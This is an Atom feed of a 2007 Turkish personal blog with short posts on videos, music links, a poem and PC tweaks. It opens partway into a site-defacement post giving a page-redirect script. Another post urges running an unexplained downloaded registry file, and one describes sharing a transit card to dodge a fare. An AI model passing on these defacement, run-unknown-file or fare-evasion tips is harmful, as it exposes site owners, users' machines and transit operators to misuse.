/&gt;&lt;br /&gt;dilediğiniz sayfaya yönlendirin.. &lt;br /&gt;&lt; s c r i p t &gt;location.replace(site adresi);&lt; /s c r i p t &gt;&lt;br /&gt;&lt;br /&gt;&lt; &gt; arasındaki boşlıkları temizleyerek kullanın...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-5590334238003959740?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/5590334238003959740/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=5590334238003959740' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/5590334238003959740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/5590334238003959740'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/index-atma-cklar_05.html' title='index atma-cıklar...'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-7550101695383650875</id><published>2007-04-05T09:28:00.001+02:00</published><updated>2007-04-05T10:37:39.989+02:00</updated><title type='text'>video siteleri arasındaki ilginç mevzular</title><content type='html'>pikniktube.com&lt;br /&gt;sendeyolla.com&lt;br /&gt;youtube.com&lt;br /&gt;&lt;br /&gt;aynı videoyu üçüne de gönderdim, sadece yootube.com yayınladı.. diğerlerinde ise hala bekliyor yada nedensiz onaylanmadı.&lt;br /&gt;&lt;br /&gt;zaten internet yawaş, video yu yüklemek o kadar zamanımızı alıyor, birde onaylamıyorsunuz yahu...&lt;br /&gt;&lt;br /&gt;yuh diyorum size...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-7550101695383650875?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/7550101695383650875/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=7550101695383650875' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7550101695383650875'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/7550101695383650875'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/video-siteleri-arasndaki-ilgin-mevzular.html' title='video siteleri arasındaki ilginç mevzular'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-8261927319684572541</id><published>2007-04-03T16:38:00.000+02:00</published><updated>2007-04-03T16:40:05.936+02:00</updated><title type='text'>bu promosyona işeyin lütfen - diyorlar</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ho-wMSXokKo"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ho-wMSXokKo" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-8261927319684572541?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/8261927319684572541/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=8261927319684572541' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/8261927319684572541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/8261927319684572541'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/bu-promosyona-ieyin-ltfen-diyorlar.html' title='bu promosyona işeyin lütfen - diyorlar'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-2424440421609025078</id><published>2007-04-02T15:31:00.003+02:00</published><updated>2007-04-03T14:05:35.161+02:00</updated><title type='text'>dünyanın en hızlı hacker ı siz olun, nasıl mı ?</title><content type='html'>&lt;a href="http://img474.imageshack.us/img474/3240/hizlihackerbigkd7.jpg" target="_blank"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px;" src="http://img352.imageshack.us/img352/2352/hizlihackerdl7.jpg" border="0"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/IaSEJjQNjZ4"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/IaSEJjQNjZ4" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-2424440421609025078?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/2424440421609025078/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=2424440421609025078' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2424440421609025078'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2424440421609025078'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/04/dnyann-en-hzl-hacker-siz-olun-nasl-m_5313.html' title='dünyanın en hızlı hacker ı siz olun, nasıl mı ?'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-3129637033239009830</id><published>2007-03-30T12:57:00.000+02:00</published><updated>2007-03-30T12:58:17.982+02:00</updated><title type='text'>serhat sahinkaya Turk Ronaldinho dan futbol dersi</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_-KqcQ8itj2c/RgztOi3pgHI/AAAAAAAAAAk/Qeqh6WsHjUU/s1600-h/ronaldinho.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://bp1.blogger.com/_-KqcQ8itj2c/RgztOi3pgHI/AAAAAAAAAAk/Qeqh6WsHjUU/s320/ronaldinho.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5047670116509646962" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/xYkw7evbkRA"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/xYkw7evbkRA" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-3129637033239009830?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/3129637033239009830/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=3129637033239009830' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/3129637033239009830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/3129637033239009830'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/serhat-sahinkaya-turk-ronaldinho-dan.html' title='serhat sahinkaya Turk Ronaldinho dan futbol dersi'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_-KqcQ8itj2c/RgztOi3pgHI/AAAAAAAAAAk/Qeqh6WsHjUU/s72-c/ronaldinho.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-2736871161808122270</id><published>2007-03-29T17:46:00.000+02:00</published><updated>2007-03-29T17:59:28.347+02:00</updated><title type='text'>IE de değişmeyen ana sayfa ya çare</title><content type='html'>Yeni bir not defteri açın. &lt;br /&gt;&lt;br /&gt;İçine :&lt;br /&gt;&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]&lt;br /&gt;"HomePage"=dword:00000000&lt;br /&gt;&lt;br /&gt;yazın ve masa üstünüze HomePageUnLockFree.reg olarak kaydedin.&lt;br /&gt;&lt;br /&gt;Masaüstündeki HomePageUnLockFree.reg e çift tıklayarak çalıştırın evet i seçin...&lt;br /&gt;&lt;br /&gt;IE artık kurtuldu..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-2736871161808122270?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/2736871161808122270/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=2736871161808122270' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2736871161808122270'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2736871161808122270'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/ie-de-deimeyen-ana-sayfa-ya-are.html' title='IE de değişmeyen ana sayfa ya çare'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-58383829051569600</id><published>2007-03-28T15:50:00.000+02:00</published><updated>2007-03-29T13:40:31.423+02:00</updated><title type='text'>Küresel ısınma, ne olur ısınma</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_-KqcQ8itj2c/RgpzHi3pgFI/AAAAAAAAAAU/v6MjzgQhb8o/s1600-h/4931757_407_01.jpg"&gt;&lt;img style="float:center; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_-KqcQ8itj2c/RgpzHi3pgFI/AAAAAAAAAAU/v6MjzgQhb8o/s320/4931757_407_01.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5046972905878552658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;kışın ortasında kar topu oynayamacağız mesela,&lt;br /&gt;havuç da takamayacağız kardan adamların burunlarına...&lt;br /&gt;yağmur duası ezberleyeceğiz mesela hep beraber,&lt;br /&gt;mehtap yerine, yağmur duasına çıkacağız heybeliden...&lt;br /&gt;&lt;br /&gt;küresel ısınma, ne olur ısınma,&lt;br /&gt;güneş orada kalsın, ayılarda kutupda...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-58383829051569600?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/58383829051569600/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=58383829051569600' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/58383829051569600'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/58383829051569600'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/kresel-snma-ne-olur-snma.html' title='Küresel ısınma, ne olur ısınma'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_-KqcQ8itj2c/RgpzHi3pgFI/AAAAAAAAAAU/v6MjzgQhb8o/s72-c/4931757_407_01.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-315899040030199293</id><published>2007-03-27T16:08:00.000+02:00</published><updated>2007-03-27T16:13:45.948+02:00</updated><title type='text'>Bu Registry Dosyasıyla Makinanızı Uçurun!</title><content type='html'>ben denedim mükemmel...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/23036242/Disophrone.Reg"&gt;http://rapidshare.com/files/23036242/Disophrone.Reg&lt;/a&gt; adresinden dosyayı indirip çalıştırın. &lt;br /&gt;Mümkünse Bu Reg Dosyasını Çalıştırmadan Önce Windows Klasörü Gibi sağlam biryere kopyalayıp o klasör içinde çalıştırın.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-315899040030199293?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/315899040030199293/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=315899040030199293' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/315899040030199293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/315899040030199293'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/bu-registry-dosyasyla-makinanz-uurun.html' title='Bu Registry Dosyasıyla Makinanızı Uçurun!'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-6987215916789392567</id><published>2007-03-27T08:50:00.000+02:00</published><updated>2007-03-27T08:52:55.196+02:00</updated><title type='text'>RIDVAN dilmen yayın arasında basıyor küfürü</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/mR0-xsLcejM"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/mR0-xsLcejM" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-6987215916789392567?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/6987215916789392567/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=6987215916789392567' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6987215916789392567'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6987215916789392567'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/ridvan-dilmen-yayn-arasnda-basyor-kfr.html' title='RIDVAN dilmen yayın arasında basıyor küfürü'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-2070164847161924177</id><published>2007-03-26T13:44:00.000+02:00</published><updated>2007-03-26T13:47:03.771+02:00</updated><title type='text'>Dj Karax - Mix : Her yerde çalan Remix</title><content type='html'>&lt;a href="http://rapidshare.com/files/21915167/Dj_Karax_-_Mix.mp3"&gt;http://rapidshare.com/files/21915167/Dj_Karax_-_Mix.mp3&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-2070164847161924177?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/2070164847161924177/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=2070164847161924177' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2070164847161924177'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/2070164847161924177'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/dj-karax-mix-her-yerde-alan-remix.html' title='Dj Karax - Mix : Her yerde çalan Remix'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-4745860688289984640</id><published>2007-03-24T09:51:00.000+02:00</published><updated>2007-03-24T14:18:25.266+02:00</updated><title type='text'>Bir akbil kullanımı ile iki seyahat</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_-KqcQ8itj2c/RgUXAomVjoI/AAAAAAAAAAM/V8Ozb87VzeE/s1600-h/aktarma1.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_-KqcQ8itj2c/RgUXAomVjoI/AAAAAAAAAAM/V8Ozb87VzeE/s320/aktarma1.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5045464257204162178" /&gt;&lt;/a&gt;&lt;br /&gt;kontörlü Akbil ile ücretsiz aktarma süresi 1,5 saattir ve bu süre içinde sadece bir defa, bir hattan diğer bir hatta veya bir sistemden diğer sisteme ücretsiz aktarma yapılabilir.&lt;br /&gt;&lt;a href="http://www.iett.gov.tr/section.php?sid=23" target="_blank"&gt;http://www.iett.gov.tr/section.php?sid=23&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;bu kaynakdan çıkaracak küçük bir hileyi anlatacağım size...&lt;br /&gt;&lt;br /&gt;iki kişisiniz ve aynı durakda otobüs bekliyorsunuz, gideceğiniz yönler farklı, yani farklı otobüslere bineceksiniz. &lt;br /&gt;ilk kimin bineceği otobüs gelirse o akbil i basıyor ve akbili diğer arkadaşına veriyor. durakda bekleyen arkadaşın otobüsü gelincede o otobüse binecek. ilk binen için akbil bir bilet düşecek, ikinci binen arkadaş için ise aktarma işlemi yapacak... bir bilete iki seyahat edeceksiniz yani :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-4745860688289984640?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/4745860688289984640/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=4745860688289984640' title='3 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/4745860688289984640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/4745860688289984640'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/bir-akbil-kullanm-ile-iki-seyahat.html' title='Bir akbil kullanımı ile iki seyahat'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_-KqcQ8itj2c/RgUXAomVjoI/AAAAAAAAAAM/V8Ozb87VzeE/s72-c/aktarma1.gif' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-1322376434331541948</id><published>2007-03-23T18:33:00.000+02:00</published><updated>2007-03-24T11:55:07.648+02:00</updated><title type='text'>Senai DEMİRCİ Kıl Beni Ey Namaz</title><content type='html'>Senai DEMİRCİ den...&lt;br /&gt;&lt;br /&gt;Kıl Beni Ey Namaz : &lt;a href="http://rapidshare.com/files/22421449/Kil_Beni_Ey_Namaz.MP3" target="_blank"&gt;http://rapidshare.com/files/22421449/Kil_Beni_Ey_Namaz.MP3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Akşamındır şimdi : &lt;a href="http://rapidshare.com/files/22422486/Aksamindir_simdi.MP3" target="_blank"&gt;http://rapidshare.com/files/22422486/Aksamindir_simdi.MP3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yandim gül oldum : &lt;a href="http://rapidshare.com/files/22521990/Yandim_gul_oldum.MP3" target="_blank"&gt;http://rapidshare.com/files/22521990/Yandim_gul_oldum.MP3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;insanın içinden bir şeyler kopuyor sanki...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-1322376434331541948?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/1322376434331541948/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=1322376434331541948' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/1322376434331541948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/1322376434331541948'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/senai-demirci-kl-beni-ey-namaz.html' title='Senai DEMİRCİ Kıl Beni Ey Namaz'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5255043838959294624.post-6856701648522585448</id><published>2007-03-23T17:46:00.000+02:00</published><updated>2007-03-23T18:03:00.185+02:00</updated><title type='text'>blog sitesi kurma amacım...</title><content type='html'>merhaba diyeyim öncelikle, sizde şimdi merhaba deyin bakiiim.. haa şöyle. henüz tanışmadık ama sizinle, inanıyorum çok sevmeyeceksiniz beni tanışırsak :)&lt;br /&gt;neyse efendim, belki seversiniz değil mi ?&lt;br /&gt;&lt;br /&gt;internet ortamında ikinci bir kişilik ediyormuş diyorlar; aynen neo ile bay enderson misali... ajan simit in dediği gibi yani... sanal alemde bir korsan, gerçek hayatta ehli namus bir programcı...&lt;br /&gt;insanın matrix i seyredipde bu tiriplere girmemesi olağan dışı olsa gerek..&lt;br /&gt;&lt;br /&gt;çoğu insan msn ortamında yazışırken kendini başka alemlerden gelen biriymiş, erişilmeyen biriymiş gibi tanıtmaya çalışıyor, gerçek hayattada böyle kişilere raslamak mümkün ancak, internetde herkes böyle anacım. kime slm çaksan, önce çok bildik laflar ile samimi olmaya çalışmalar, efendim kendisi bilmem nerenin bir şeyiymiş meğersemli cümleler.. sonra eee sen hiç yazmıyorsun deyivermez mi.. yani klavyede tuş kalmadı ki yazayım, senin yazdıklarına yetişemiyorum.. atıp tutamıyorum senin kadar mesela :)&lt;br /&gt;&lt;br /&gt;bende internet aleminde, sanal olan tarafından ynlzbn olarak yaşıyorum... bazı pis işleri buradan yapıyorum mesela :)&lt;br /&gt;&lt;br /&gt;neyse ilerde pis işlerimle karşınızda olurum... biraz merak edin  :)&lt;br /&gt;&lt;br /&gt;sizleri seviyorum bee...&lt;br /&gt;&lt;br /&gt;durun durun başlığı amaç diye atmışım blogger a ayıp olmasın lafı toparlayalım: kendini ynlzbn sanan adamın neler yaptığını görmeniz için açtım bu blog u... bakalım neler yapacak...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5255043838959294624-6856701648522585448?l=ynlzbn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ynlzbn.blogspot.com/feeds/6856701648522585448/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5255043838959294624&amp;postID=6856701648522585448' title='0 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6856701648522585448'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5255043838959294624/posts/default/6856701648522585448'/><link rel='alternate' type='text/html' href='http://ynlzbn.blogspot.com/2007/03/blog-sitesi-kurma-amacm.html' title='blog sitesi kurma amacım...'/><author><name>ynlzbn</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://img504.imageshack.us/img504/299/130x130424566546vd6.jpg'/></author><thr:total>0</thr:total></entry></feed>
